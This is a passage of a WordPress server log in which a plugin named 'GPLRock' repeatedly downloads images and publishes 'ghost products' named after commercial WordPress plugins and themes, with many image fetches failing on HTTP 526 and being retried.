https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84f78b00.jpg [04-Apr-2026 09:24:46 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-realtime-notifications-addon [04-Apr-2026 09:24:48 UTC] GPLRock: Image downloaded successfully for product searchwp-edd-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-571a34f7.jpg [04-Apr-2026 09:24:48 UTC] GPLRock: Using pre-downloaded image for product searchwp-edd-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-571a34f7.jpg [04-Apr-2026 09:24:48 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-edd-integration [04-Apr-2026 09:24:49 UTC] GPLRock: Image downloaded successfully for product soliloquy-schedule-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-612d167b.jpg [04-Apr-2026 09:24:49 UTC] GPLRock: Using pre-downloaded image for product soliloquy-schedule-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-612d167b.jpg [04-Apr-2026 09:24:49 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-schedule-addon [04-Apr-2026 09:24:51 UTC] GPLRock: Image downloaded successfully for product mythemeshop-report-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe4b9daf.jpg [04-Apr-2026 09:24:51 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-report-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe4b9daf.jpg [04-Apr-2026 09:24:51 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-report-wordpress-theme [04-Apr-2026 09:33:00 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-surveys-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-336e1658.jpg [04-Apr-2026 09:33:01 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-surveys-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-336e1658.jpg [04-Apr-2026 09:33:01 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-surveys-premium [04-Apr-2026 09:33:02 UTC] GPLRock: Image downloaded successfully for product studiopress-foodie-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bbbaf497.jpg [04-Apr-2026 09:33:02 UTC] GPLRock: Using pre-downloaded image for product studiopress-foodie-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bbbaf497.jpg [04-Apr-2026 09:33:02 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-foodie-pro-genesis-wordpress-theme [04-Apr-2026 09:33:04 UTC] GPLRock: Image downloaded successfully for product mainwp-google-analytics (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c58daff.jpg [04-Apr-2026 09:33:04 UTC] GPLRock: Using pre-downloaded image for product mainwp-google-analytics: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c58daff.jpg [04-Apr-2026 09:33:04 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-google-analytics [04-Apr-2026 09:33:05 UTC] GPLRock: Image downloaded successfully for product themify-tiles-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6713c62a.jpg [04-Apr-2026 09:33:05 UTC] GPLRock: Using pre-downloaded image for product themify-tiles-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6713c62a.jpg [04-Apr-2026 09:33:05 UTC] GPLRock: Ghost product published with image - Product ID: themify-tiles-plugin [04-Apr-2026 09:33:07 UTC] GPLRock: Image downloaded successfully for product wpfomify-drip-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9de1bb9c.jpg [04-Apr-2026 09:33:07 UTC] GPLRock: Using pre-downloaded image for product wpfomify-drip-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9de1bb9c.jpg [04-Apr-2026 09:33:07 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-drip-addon [04-Apr-2026 09:33:08 UTC] GPLRock: Image downloaded successfully for product reactive-pro-advanced-wordpress-search-filter-map-grid (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8637c84.jpg [04-Apr-2026 09:33:08 UTC] GPLRock: Using pre-downloaded image for product reactive-pro-advanced-wordpress-search-filter-map-grid: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8637c84.jpg [04-Apr-2026 09:33:08 UTC] GPLRock: Ghost product published with image - Product ID: reactive-pro-advanced-wordpress-search-filter-map-grid [04-Apr-2026 09:33:10 UTC] GPLRock: Image downloaded successfully for product elmastudio-suidobashi-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39ebdf72.jpg [04-Apr-2026 09:33:10 UTC] GPLRock: Using pre-downloaded image for product elmastudio-suidobashi-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39ebdf72.jpg [04-Apr-2026 09:33:10 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-suidobashi-wordpress-theme [04-Apr-2026 09:33:11 UTC] GPLRock: Image downloaded successfully for product ultimate-member-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-17e16745.jpg [04-Apr-2026 09:33:11 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-17e16745.jpg [04-Apr-2026 09:33:11 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-for-woocommerce [04-Apr-2026 09:33:13 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wp-time-to-read (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f1fd84e.jpg [04-Apr-2026 09:33:13 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wp-time-to-read: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f1fd84e.jpg [04-Apr-2026 09:33:13 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wp-time-to-read [04-Apr-2026 09:33:14 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-gravity-forms-multilingual-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bc4c5b4b.jpg [04-Apr-2026 09:33:14 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-gravity-forms-multilingual-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bc4c5b4b.jpg [04-Apr-2026 09:33:14 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-gravity-forms-multilingual-add-on [04-Apr-2026 09:34:33 UTC] GPLRock: Image download failed for product appkit-mobile (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:34:35 UTC] GPLRock: Image download failed for product appkit-mobile (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:20 UTC] GPLRock: Image download failed for product elyasa-responsive-coming-soon-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:22 UTC] GPLRock: Image download failed for product elyasa-responsive-coming-soon-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elyasa---responsive-coming-soon-wordpress-plugin-17934.webp for product elyasa-responsive-coming-soon-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:24 UTC] GPLRock: Image download failed for product elyasa-responsive-coming-soon-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:26 UTC] GPLRock: Image download failed for product elyasa-responsive-coming-soon-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elyasa---responsive-coming-soon-wordpress-plugin-17934.webp for product elyasa-responsive-coming-soon-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:28 UTC] GPLRock WARNING: Image download failed for product elyasa-responsive-coming-soon-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/elyasa---responsive-coming-soon-wordpress-plugin-17934.webp [04-Apr-2026 09:45:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elyasa-responsive-coming-soon-wordpress-plugin [04-Apr-2026 09:45:28 UTC] GPLRock: Image download failed for product ultimate-smart-slider-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:30 UTC] GPLRock: Image download failed for product ultimate-smart-slider-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-smart-slider---wordpress-25155.webp for product ultimate-smart-slider-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:33 UTC] GPLRock: Image download failed for product ultimate-smart-slider-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:35 UTC] GPLRock: Image download failed for product ultimate-smart-slider-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-smart-slider---wordpress-25155.webp for product ultimate-smart-slider-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:37 UTC] GPLRock WARNING: Image download failed for product ultimate-smart-slider-wordpress. URL: https://meldwp.com/wp-content/uploads/ultimate-smart-slider---wordpress-25155.webp [04-Apr-2026 09:45:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-smart-slider-wordpress [04-Apr-2026 09:45:37 UTC] GPLRock: Image download failed for product meetpress-addon-streamline-your-bookings-with-google-meet (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:39 UTC] GPLRock: Image download failed for product meetpress-addon-streamline-your-bookings-with-google-meet (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/meetpress-addon--streamline-your-bookings-with-google-meet-31871.webp for product meetpress-addon-streamline-your-bookings-with-google-meet after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:42 UTC] GPLRock: Image download failed for product meetpress-addon-streamline-your-bookings-with-google-meet (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:44 UTC] GPLRock: Image download failed for product meetpress-addon-streamline-your-bookings-with-google-meet (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/meetpress-addon--streamline-your-bookings-with-google-meet-31871.webp for product meetpress-addon-streamline-your-bookings-with-google-meet after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:46 UTC] GPLRock WARNING: Image download failed for product meetpress-addon-streamline-your-bookings-with-google-meet. URL: https://meldwp.com/wp-content/uploads/meetpress-addon--streamline-your-bookings-with-google-meet-31871.webp [04-Apr-2026 09:45:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: meetpress-addon-streamline-your-bookings-with-google-meet [04-Apr-2026 09:45:46 UTC] GPLRock: Image download failed for product full-width-background-image-slider (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:48 UTC] GPLRock: Image download failed for product full-width-background-image-slider (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/full-width-background-image-slider-24637.webp for product full-width-background-image-slider after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:50 UTC] GPLRock: Image download failed for product full-width-background-image-slider (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:52 UTC] GPLRock: Image download failed for product full-width-background-image-slider (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/full-width-background-image-slider-24637.webp for product full-width-background-image-slider after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:54 UTC] GPLRock WARNING: Image download failed for product full-width-background-image-slider. URL: https://meldwp.com/wp-content/uploads/full-width-background-image-slider-24637.webp [04-Apr-2026 09:45:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: full-width-background-image-slider [04-Apr-2026 09:45:55 UTC] GPLRock: Image download failed for product b2b-marketplace-vendor-subdomain-for-woocommerce-webkul-codecanyon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:57 UTC] GPLRock: Image download failed for product b2b-marketplace-vendor-subdomain-for-woocommerce-webkul-codecanyon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:45:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/b2b-marketplace-vendor-subdomain-for-woocommerce---webkul--codecanyon-13824.webp for product b2b-marketplace-vendor-subdomain-for-woocommerce-webkul-codecanyon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:45:59 UTC] GPLRock: Image download failed for product b2b-marketplace-vendor-subdomain-for-woocommerce-webkul-codecanyon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:01 UTC] GPLRock: Image download failed for product b2b-marketplace-vendor-subdomain-for-woocommerce-webkul-codecanyon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/b2b-marketplace-vendor-subdomain-for-woocommerce---webkul--codecanyon-13824.webp for product b2b-marketplace-vendor-subdomain-for-woocommerce-webkul-codecanyon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:03 UTC] GPLRock WARNING: Image download failed for product b2b-marketplace-vendor-subdomain-for-woocommerce-webkul-codecanyon. URL: https://meldwp.com/wp-content/uploads/b2b-marketplace-vendor-subdomain-for-woocommerce---webkul--codecanyon-13824.webp [04-Apr-2026 09:46:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: b2b-marketplace-vendor-subdomain-for-woocommerce-webkul-codecanyon [04-Apr-2026 09:46:03 UTC] GPLRock: Image download failed for product advanced-justified-portfolio-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:05 UTC] GPLRock: Image download failed for product advanced-justified-portfolio-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-justified-portfolio-builder-19297.webp for product advanced-justified-portfolio-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:08 UTC] GPLRock: Image download failed for product advanced-justified-portfolio-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:10 UTC] GPLRock: Image download failed for product advanced-justified-portfolio-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-justified-portfolio-builder-19297.webp for product advanced-justified-portfolio-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:12 UTC] GPLRock WARNING: Image download failed for product advanced-justified-portfolio-builder. URL: https://meldwp.com/wp-content/uploads/advanced-justified-portfolio-builder-19297.webp [04-Apr-2026 09:46:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advanced-justified-portfolio-builder [04-Apr-2026 09:46:12 UTC] GPLRock: Image download failed for product social-share-locker-pro-theme-pack-wb (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:14 UTC] GPLRock: Image download failed for product social-share-locker-pro-theme-pack-wb (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-share--locker-pro-theme-pack-wb-32913.webp for product social-share-locker-pro-theme-pack-wb after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:16 UTC] GPLRock: Image download failed for product social-share-locker-pro-theme-pack-wb (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:18 UTC] GPLRock: Image download failed for product social-share-locker-pro-theme-pack-wb (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-share--locker-pro-theme-pack-wb-32913.webp for product social-share-locker-pro-theme-pack-wb after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:20 UTC] GPLRock WARNING: Image download failed for product social-share-locker-pro-theme-pack-wb. URL: https://meldwp.com/wp-content/uploads/social-share--locker-pro-theme-pack-wb-32913.webp [04-Apr-2026 09:46:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-share-locker-pro-theme-pack-wb [04-Apr-2026 09:46:21 UTC] GPLRock: Image download failed for product wordfex-syncronize-wordpress-with-perfex (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:23 UTC] GPLRock: Image download failed for product wordfex-syncronize-wordpress-with-perfex (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordfex---syncronize-wordpress-with-perfex-10803.webp for product wordfex-syncronize-wordpress-with-perfex after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:25 UTC] GPLRock: Image download failed for product wordfex-syncronize-wordpress-with-perfex (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:27 UTC] GPLRock: Image download failed for product wordfex-syncronize-wordpress-with-perfex (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordfex---syncronize-wordpress-with-perfex-10803.webp for product wordfex-syncronize-wordpress-with-perfex after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:29 UTC] GPLRock WARNING: Image download failed for product wordfex-syncronize-wordpress-with-perfex. URL: https://meldwp.com/wp-content/uploads/wordfex---syncronize-wordpress-with-perfex-10803.webp [04-Apr-2026 09:46:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordfex-syncronize-wordpress-with-perfex [04-Apr-2026 09:46:29 UTC] GPLRock: Image download failed for product background-switcher-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:31 UTC] GPLRock: Image download failed for product background-switcher-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/background-switcher-addon-for-elementor-2962.webp for product background-switcher-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:34 UTC] GPLRock: Image download failed for product background-switcher-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:36 UTC] GPLRock: Image download failed for product background-switcher-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/background-switcher-addon-for-elementor-2962.webp for product background-switcher-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:38 UTC] GPLRock WARNING: Image download failed for product background-switcher-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/background-switcher-addon-for-elementor-2962.webp [04-Apr-2026 09:46:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: background-switcher-addon-for-elementor [04-Apr-2026 09:46:38 UTC] GPLRock: Image download failed for product jcountdown-mega-package-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:40 UTC] GPLRock: Image download failed for product jcountdown-mega-package-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jcountdown-mega-package-for-wordpress-11007.webp for product jcountdown-mega-package-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:42 UTC] GPLRock: Image download failed for product jcountdown-mega-package-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:44 UTC] GPLRock: Image download failed for product jcountdown-mega-package-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:46:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jcountdown-mega-package-for-wordpress-11007.webp for product jcountdown-mega-package-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:46:46 UTC] GPLRock WARNING: Image download failed for product jcountdown-mega-package-for-wordpress. URL: https://meldwp.com/wp-content/uploads/jcountdown-mega-package-for-wordpress-11007.webp [04-Apr-2026 09:46:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jcountdown-mega-package-for-wordpress [04-Apr-2026 09:47:31 UTC] GPLRock: Image downloaded successfully for product lawio-attorney-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f7dacd6.webp [04-Apr-2026 09:47:31 UTC] GPLRock: Using pre-downloaded image for product lawio-attorney-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f7dacd6.webp [04-Apr-2026 09:47:31 UTC] GPLRock: Ghost product published with image - Product ID: lawio-attorney-law-firm-elementor-template-kit [04-Apr-2026 09:47:32 UTC] GPLRock: Image downloaded successfully for product lawin-lawyer-attorney-personal-elementor-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63ea4915.webp [04-Apr-2026 09:47:32 UTC] GPLRock: Using pre-downloaded image for product lawin-lawyer-attorney-personal-elementor-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63ea4915.webp [04-Apr-2026 09:47:32 UTC] GPLRock: Ghost product published with image - Product ID: lawin-lawyer-attorney-personal-elementor-template-kits [04-Apr-2026 09:47:34 UTC] GPLRock: Image downloaded successfully for product lawgne-attorney-lawyers-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de26530f.webp [04-Apr-2026 09:47:34 UTC] GPLRock: Using pre-downloaded image for product lawgne-attorney-lawyers-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de26530f.webp [04-Apr-2026 09:47:34 UTC] GPLRock: Ghost product published with image - Product ID: lawgne-attorney-lawyers-elementor-template-kit [04-Apr-2026 09:47:35 UTC] GPLRock: Image downloaded successfully for product lawe-lawyer-attorney-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7cd510b.webp [04-Apr-2026 09:47:35 UTC] GPLRock: Using pre-downloaded image for product lawe-lawyer-attorney-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7cd510b.webp [04-Apr-2026 09:47:35 UTC] GPLRock: Ghost product published with image - Product ID: lawe-lawyer-attorney-elementor-template-kit [04-Apr-2026 09:47:37 UTC] GPLRock: Image downloaded successfully for product lawak-legal-lawyer-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05eeae22.webp [04-Apr-2026 09:47:37 UTC] GPLRock: Using pre-downloaded image for product lawak-legal-lawyer-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05eeae22.webp [04-Apr-2026 09:47:37 UTC] GPLRock: Ghost product published with image - Product ID: lawak-legal-lawyer-services-elementor-template-kit [04-Apr-2026 09:47:38 UTC] GPLRock: Image downloaded successfully for product law-order-law-firm-and-lawyers-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d6fbd398.webp [04-Apr-2026 09:47:38 UTC] GPLRock: Using pre-downloaded image for product law-order-law-firm-and-lawyers-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d6fbd398.webp [04-Apr-2026 09:47:38 UTC] GPLRock: Ghost product published with image - Product ID: law-order-law-firm-and-lawyers-elementor-template-kit [04-Apr-2026 09:47:39 UTC] GPLRock: Image downloaded successfully for product lavi-travel-blog-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a17757de.webp [04-Apr-2026 09:47:39 UTC] GPLRock: Using pre-downloaded image for product lavi-travel-blog-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a17757de.webp [04-Apr-2026 09:47:39 UTC] GPLRock: Ghost product published with image - Product ID: lavi-travel-blog-elementor-template-kit [04-Apr-2026 09:47:41 UTC] GPLRock: Image downloaded successfully for product laundryes-laundry-cleaning-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7958f8a4.webp [04-Apr-2026 09:47:41 UTC] GPLRock: Using pre-downloaded image for product laundryes-laundry-cleaning-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7958f8a4.webp [04-Apr-2026 09:47:41 UTC] GPLRock: Ghost product published with image - Product ID: laundryes-laundry-cleaning-elementor-template-kit [04-Apr-2026 09:47:42 UTC] GPLRock: Image downloaded successfully for product lapar-restaurant-cafe-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e03b456.webp [04-Apr-2026 09:47:42 UTC] GPLRock: Using pre-downloaded image for product lapar-restaurant-cafe-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e03b456.webp [04-Apr-2026 09:47:42 UTC] GPLRock: Ghost product published with image - Product ID: lapar-restaurant-cafe-elementor-template-kit [04-Apr-2026 09:47:44 UTC] GPLRock: Image downloaded successfully for product landio-multipurpose-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-64f5bf7f.webp [04-Apr-2026 09:47:44 UTC] GPLRock: Using pre-downloaded image for product landio-multipurpose-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-64f5bf7f.webp [04-Apr-2026 09:47:44 UTC] GPLRock: Ghost product published with image - Product ID: landio-multipurpose-elementor-template-kit [04-Apr-2026 09:48:44 UTC] GPLRock: Image download failed for product enginx-auto-repair-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:48:46 UTC] GPLRock: Image download failed for product enginx-auto-repair-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:48:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enginx--auto-repair-service-wordpress-theme-9404.webp for product enginx-auto-repair-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:48:48 UTC] GPLRock: Image download failed for product enginx-auto-repair-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:48:50 UTC] GPLRock: Image download failed for product enginx-auto-repair-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:48:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enginx--auto-repair-service-wordpress-theme-9404.webp for product enginx-auto-repair-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:48:52 UTC] GPLRock WARNING: Image download failed for product enginx-auto-repair-service-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/enginx--auto-repair-service-wordpress-theme-9404.webp [04-Apr-2026 09:48:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enginx-auto-repair-service-wordpress-theme [04-Apr-2026 09:48:52 UTC] GPLRock: Image download failed for product saasten-saas-software-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:48:55 UTC] GPLRock: Image download failed for product 